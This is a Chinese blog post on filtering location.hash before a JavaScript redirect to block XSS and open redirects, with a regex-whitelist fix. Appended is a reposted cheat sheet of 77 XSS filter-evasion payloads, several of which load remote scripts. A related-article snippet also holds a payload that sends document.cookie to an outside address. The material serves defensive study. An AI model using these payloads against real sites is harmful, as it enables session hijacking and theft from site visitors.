javascript如何对location.hash过滤xss跨站脚本

最新推荐文章于 2025-01-05 19:50:24 发布
最新推荐文章于 2025-01-05 19:50:24 发布
阅读量2.3k 收藏 2
点赞数
分类专栏: javascript 文章标签: javascript xss web安全 ViewUI
本文介绍了如何通过正则表达式验证location.hash的值来防止XSS跨站脚本攻击和中转服务器的问题,确保了只有符合特定模式的URL才会被跳转。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

场景:

需要获取类似如下url的hash值并做跳转:

http://www.xxx.com/home#/comments?type=0

 

改进前:

    (function() {
        var originalUrl = window.location.href,
            toUrl = originalUrl.indexOf('#') != -1 && originalUrl.split('#')[1];
        if (toUrl) {
            window.location.href = toUrl;
        }
    })();

 

很简单的处理方法,完全没有考虑到如下的安全问题:

1、xss跨站脚本攻击

如:

http://www.xxx.com/home#javascript:alert(document.cookie);

 

2、中转服务器

http://www.xxx.com/home#http://www.zzz.com

 

 

改进后:

    (function() {
        var originalUrl = window.location.href,
            toUrl = originalUrl.indexOf('#') != -1 && originalUrl.split('#')[1],
            reg=/^[\w\?&=\/]*$/;

        if (toUrl&&reg.test(toUrl)) {
            window.location.href = toUrl;
        }
    })();

 

网上介绍的xss跨站脚本攻击的过滤方法实在太多了,javascript的关键字,还有各种各样的编码,字符串组合,与其考虑需要过滤的条件,还不如多多考虑应用场景,在这里我们的location.hash的值只是本域内的普通url,故暂且做了以上的改进。

 

附(网转):

<!--
XSS攻击汇总 

(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”

(27)双开角括号
<iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript
\”;alert(‘XSS’);//

(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>

(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签
<BODY(‘XSS’)>

(34)IMG Dynsrc
<IMG DYNSRC=”javascript:alert(‘XSS’)”>

(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>

(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>

(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

(41)META链接url
<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>

(42)Iframe
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6

(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert(“XSS”))’>

(53)STYLE background
<STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上<HTML xmlns:xss><?importnamespace=”xss” implementation=”http://3w.org/XSS/xss.htc”><xss:xss>XSS</xss:xss>
</HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用<SCRIPT SRC=””></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令<IMG SRC=”http://www.XXX.com/a.php?a=b”>

(60)IMG嵌入式命令(a.jpg在同服务器)Redirect302/a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(62)<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(63)<SCRIPT a=”>”” SRC=”http://3w.org/xss.js”></SCRIPT>

(64)<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

(65)<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>

(66)12-7-1 T00LS -PoweredbyDiscuz!Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>

(67)<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>

(68)URL绕行
<A HREF=”http://127.0.0.1/”>XSS</A>

(69)URL编码
<A HREF=”http://3w.org”>XSS</A>

(70)IP十进制
<A HREF=”http://3232235521″>XSS</A>

(71)IP十六进制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>

(73)混合编码
<A HREF=”h
tt p://66.000146.0×7.147/”">XSS</A>

(74)节省[http:]
<A HREF=”//www.google.com/”>XSS</A>

(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>

(76)绝对点绝对DNS
<A HREF=”http://www.google.com./”>XSS</A>

(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

-->

 

JavaScript拦截跨站脚本攻击XSS)的浅析
ByteZenith的博客
09-18 734
XSS攻击是一种常见的网络安全威胁,但通过一些简单的JavaScript技术,我们可以有效地拦截这类攻击。然而,为了确保前端安全性,我们还应该保持对最新安全漏洞和防御技术的了解,并采取综合的安全措施,以保护用户和网站的安全跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的网络安全威胁,攻击者通过在网页中注入恶意脚本,从而在用户浏览器中执行恶意代码。在实际应用中,建议结合其他安全措施和最佳实践,如输入过滤、输出编码、使用安全的框架和库等,以建立更可靠的前端安全防护体系。
渗透测试之XSS跨站脚本攻击
Hi~ 土拨鼠
12-14 3496
文章目录XSS 漏洞概述XSS 分类XSS 危害XSS 漏洞的验证 XSS 漏洞概述 XSS是OWASP TOP 10 之一。 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS 可以非常灵活的操作html、css和浏览器,这使得XSS攻击的“想象"空间特别大。 XSS通过将精心构造的
javascript过滤XSS
05-06
javascript写的过滤XSS代码,危险代码被转义而不是被删除. 根目录下js-xss-master/dist/test.html是例子.
jQuery跨站脚本漏洞XSS with $(location.hash)漏洞
weixin_34090643的博客
12-01 4742
jquery下载地址:https://code.jquery.com/jquery/ 影响范围:版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞已测试成功版本:jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.jsjquery-...
【9大跨域解决方案】location.hash解决跨域的原理
2024路在何方
04-08 3497
通过hash实现跨域通信 该方法跟window.name类似,有点神奇,有点绕,鲜有人用,但确实能够实现跨域通信。那么,我们下面详细讲解下如何利用hash实现跨域。 引例 前提准备: a.html,起在localhost:3000上 b.html,起在localhost:3000上 c.html,起在localhost:4000上 可见a和b是同域的,c是独立的 需求:在a页面获取...
怎样过滤跨站恶意脚本攻击XSS
weixin_33872566的博客
10-12 495
什么是XSSXSS(Cross Site Scripting),即跨站脚本攻击,是一种常见于web application中的计算机安全漏洞。XSS通过在用户端注入恶意的可运行脚本,若服务器端对用户输入不进行处理,直接将用户输入输出到浏览器,则浏览器将会执行用户注入的脚本。例如:有一个input输入框,要求用户输入名字,用户输入lily<script>alert("hello ...
xss跨站脚本攻击
qq_64951792的博客
08-18 1538
xss攻击
XSS-跨站脚本攻击
m0_61858762的博客
08-17 1524
xss的初步学习
WEB漏洞篇——跨站脚本攻击XSS
m0_56634355的博客
06-05 4932
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
跨站脚本攻击XSS)详解
最新发布
2402_86725606的博客
01-05 1772
跨站脚本攻击XSS,Cross-Site Scripting)是一种通过在网页中注入恶意脚本,攻击用户浏览器的漏洞。攻击者可以利用XSS窃取用户敏感信息、劫持会话、或在受害者浏览器中执行恶意操作。通过及时识别和修复漏洞、使用安全编码实践和部署防御技术,可以有效预防XSS攻击的发生。
XSS攻击 eval(location.hash.substr(1)); 笔记
hello world
02-16 3004
前言 参考文档:web前端黑客技术揭秘笔记 第三章 假设已经配置好hosts文件: 127.0.0.1 www.foo.com 127.0.0.1 www.evil.com 配置 根目录新建xssme.html文件,内容为: <script> eval(location.hash.substr(1)); </script> 以及alert.js文件,内容为: alert("123"); alert 浏览器访问http://127.0.0.1/xssme
jQuery windows.location.hash作用
tanqingfu1的博客
12-23 974
window.location.hash 中的 hash 属性是一个可读可写的字符串,该字符串是 URL 的锚部分(从 # 号开始的部分)。 # :代表网页中的一个位置。其页面的字符,就是该位置的标识符 我们知道很多时候做一些问卷调查的时候当用户有的题目没有选择选项的时候 需要智能的提示并且定位到没有选择的题目 这个时候的window.location.hash 锚点就起到作用了 ...
location.href用法总结(转)
iteye_4348的博客
09-07 222
javascript中的location.href有很多种用法,主要如下。 self.location.href=”/url” 当前页面打开URL页面 location.href=”/url” 当前页面打开URL页面 windows.location.href=”/url” 当前页面打开URL页面,前面三个用法相同。 this.location.href=”/url” 当前页面打开URL页面 ...
白帽子讲web安全笔记-利用location.hash绕过长度限制_使用DVWA实现
Leonard_wang的专栏
12-21 2062
在DVWA实现利用location.hash突破针对xss攻击的长度限制
web渗透测试----25、跨站脚本攻击简介--(1)XSS的构造方法
七天
03-09 1402
XSS的构造方法
burp靶场--xss上篇【1-15】
qq_33168924的博客
01-29 2946
跨站脚本 (XSS) 是一种通常出现在 Web 应用程序中的计算机安全漏洞。XSS 允许攻击者将恶意代码注入网站,然后在访问该网站的任何人的浏览器中执行该代码。这可能允许攻击者窃取敏感信息,例如用户登录凭据,或执行其他恶意操作。XSS 攻击主要有 3 种类型:反射型 XSS:在反射型 XSS 攻击中,恶意代码嵌入到发送给受害者的链接中。当受害者点击链接时,代码就会在他们的浏览器中执行。例如,攻击者可以创建包含恶意 JavaScript 的链接,并将其通过电子邮件发送给受害者。
利用location来变形我们的XSS Payload
即刻出发吧
04-06 1813
XSS的时候,有时候有的过滤器很变态,会过滤很多特殊符号和关键词,比如&、(、)、#、'、",特别是&和括号,少了的话payload很难构造出来。 举个例子吧,比如过滤过滤了array("(",")","&","\\","","'"),而没有过滤双引号,输出点在,xxxx这里,怎么构造一个可以利用的XSS Payload? 过滤代码如下: 所有人肯定都知道,先闭合
xss总结
qq_43550748的博客
01-30 392
xss总结 1.常用payload 1.//配合xss后台使用 <script>document.location='http://127.0.0.1?cookie=' + document.cookie</script> 或 <img src=x onerror=a=document.cookie;document.location='http://192.168....
Web安全
xiu362726602的博客
07-11 219
注意,一般网站的`私钥Key1`和`公钥Key2`是长期不变的,但是每次回话用于对称加密的`Key3`都是会变化的,否则攻击者完全可以以另一个合法用户的身份拿到相同的`Key3`。2. 服务端对每个用户生成一个 token,把token当作cookie设置在浏览器中,前端将此cookie取出后,每次发请求时添加到`请求头`或者`请求体`或者`请求参数`中,服务端接收请求时将cookie中的token和`请求头`或者`请求体`或者`请求参数`中的token比对,一致则通过。移除用户输入的和事件相关的属性。
跨站脚本攻击xss实现
12-29
### 跨站脚本攻击XSS)实现方法及原理 #### XSS 攻击概述 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的Web应用程序安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。这些脚本会在受害者的浏览器环境中执行,可能导致敏感信息泄露或其他有害行为的发生[^2]。 #### XSS 的分类 XSS 主要分为三种类型: - **存储型 XSS**:恶意脚本被永久保存在目标服务器上,比如数据库或文件系统中。每当受害者请求含有该脚本的数据时便会触发攻击。 - **反射型 XSS**:通过URL参数、表单输入等方式将恶意代码发送给服务器,再由服务器返回给客户端显示出来,在这个过程中完成攻击过程。 - **DOM 型 XSS**:不同于前两者依赖于服务端响应来传播有效载荷,这类攻击完全发生在客户端侧,即JavaScript直接操作文档对象模型 (Document Object Model),当某些特定条件满足时便能激活预埋下的危险指令[^3]。 #### 实现机制 为了成功实施一次典型的XSS攻击,通常需要以下几个要素协同工作: 1. 找到一个可以接受用户输入的地方; 2. 输入未经过适当验证和清理的内容; 3. 将此未经处理过的数据反馈回HTML页面内展示给最终使用者看到; 一旦上述情况发生,则意味着存在潜在风险点可用于发起进一步行动——例如插入一段`<script>`标签包裹着任意可被执行javascript语句作为payload传入受影响区域等待时机成熟后自动运行起来影响更多无辜浏览者[^4]。 ```html <!-- 反射型XSS示例 --> <a href="http://example.com/search?q=<script>alert('XSS')</script>">点击这里</a> <!-- 存储型XSS示例 --> <textarea name="comment"> <script> alert(document.cookie); </script> </textarea> <!-- DOM型XSS示例 --> <input type="text" id="searchBox"/> <script> document.getElementById("searchBox").value = location.hash.slice(1); // 如果hash包含恶意代码则会立即执行 </script> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值